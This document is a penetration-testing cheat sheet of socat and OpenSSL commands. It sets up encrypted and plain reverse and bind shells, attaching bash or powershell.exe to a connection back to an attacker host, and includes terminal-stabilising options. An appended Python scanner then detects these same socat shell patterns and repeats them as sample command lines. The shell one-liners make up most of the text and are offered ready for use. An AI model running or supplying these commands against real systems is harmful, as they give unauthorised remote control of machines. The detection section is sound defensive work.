Generating the key and self-signed certificate (-nodes leaves the private key unencrypted):

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem

Establishing the encrypted connection (target):

# listener that presents shell.pem; runs on the side that receives the shell
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
# target connects back and attaches /bin/bash (encrypted reverse shell)
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Establishing the encrypted connection (attacker):

# connects to an OPENSSL-LISTEN on the target, e.g. an encrypted bind shell
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Decrypting with the private key:

# rsautl is deprecated in OpenSSL 3.x; pkeyutl -decrypt accepts the same -inkey/-in/-out options
openssl rsautl -decrypt -inkey <private-key> -in <encrypted-file> -out <decrypted-file>

Connecting with socat and OpenSSL (client key and certificate):

socat stdio \
    openssl-connect:[IP]:[PORT],openssl-commonname=socatssl,cert=cert,key=key,verify=0

Reverse shell with socat:

# listener (attacker side)
socat TCP-L:<port> -
# target side: Windows (pipes is required for powershell.exe) or Linux
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Bind shell with socat:

# target side: Linux or Windows
socat TCP-L:<PORT> EXEC:"bash -li"
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
# attacker side connects to the listener
socat TCP:<TARGET-IP>:<TARGET-PORT> -

Additional notes:

These options are appended, comma-separated, to the EXEC address (e.g. EXEC:"bash -li",pty,stderr,setsid,sigint,sane):

  • pty: allocates a pseudoterminal on the target (part of the stabilisation process)
  • stderr: makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
  • sigint: passes any Ctrl + C through to the sub-process, allowing commands inside the shell to be killed
  • setsid: creates the process in a new session
  • sane: stabilises the terminal, attempting to "normalise" it
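A defender-side counterpart to the commands in these notes, added here as an example and not part of the original cheat sheet: a small Python scanner that flags socat process command lines which attach an interactive shell to a TCP/OpenSSL address (bind or reverse) or use an OpenSSL address with verify=0. The sample command lines are constructed, not real telemetry.

```python
import os
import re
import shlex

# Constructed sample process command lines: the socat patterns from the notes
# above mixed with benign socat/openssl usage.
SAMPLE_CMDLINES = [
    "socat OPENSSL-LISTEN:4443,cert=shell.pem,verify=0 -",
    "socat OPENSSL:10.0.0.5:4443,verify=0 EXEC:/bin/bash",
    "socat TCP:10.0.0.5:4444 EXEC:powershell.exe,pipes",
    'socat TCP-L:4444 EXEC:"bash -li",pty,stderr,setsid,sigint,sane',
    "socat TCP-LISTEN:8080,fork TCP:127.0.0.1:80",
    "socat - UNIX-CONNECT:/var/run/docker.sock",
    "openssl s_client -connect example.test:443",
]

# socat address forms: listening vs. connecting TCP/OpenSSL, and EXEC of a shell.
LISTEN_RE = re.compile(r"^(?:tcp[46]?|openssl|ssl)-l(?:isten)?:", re.I)
CONNECT_RE = re.compile(r"^(?:tcp[46]?|openssl|ssl)(?:-connect)?:", re.I)
SHELL_RE = re.compile(
    r"^exec:(?:\S*/)?(?:bash|sh|dash|zsh|powershell(?:\.exe)?|cmd(?:\.exe)?)\b", re.I)

REVERSE = "reverse shell: interactive shell attached to an outbound connection"
BIND = "bind shell: interactive shell exposed on a listening socket"
NOVERIFY = "TLS without certificate verification (verify=0)"


def classify_socat(cmdline):
    """Return the list of detection reasons for one command line (empty if benign)."""
    try:
        argv = shlex.split(cmdline)  # strips the quotes around EXEC:"bash -li"
    except ValueError:
        return ["unparseable command line"]
    if not argv or os.path.basename(argv[0]).lower() != "socat":
        return []
    # socat options start with "-"; the bare "-" address means stdio and is kept.
    addrs = [a for a in argv[1:] if a == "-" or not a.startswith("-")]
    reasons = []
    shell = any(SHELL_RE.match(a) for a in addrs)
    if shell and any(LISTEN_RE.match(a) for a in addrs):
        reasons.append(BIND)
    elif shell and any(CONNECT_RE.match(a) for a in addrs):
        reasons.append(REVERSE)
    if any(a.upper().startswith(("OPENSSL", "SSL")) and "verify=0" in a.lower() for a in addrs):
        reasons.append(NOVERIFY)
    return reasons


def scan(cmdlines):
    """Map each flagged command line to its reasons; benign lines are omitted."""
    return {c: r for c in cmdlines if (r := classify_socat(c))}


if __name__ == "__main__":
    for line, why in scan(SAMPLE_CMDLINES).items():
        print(line, "->", "; ".join(why))
```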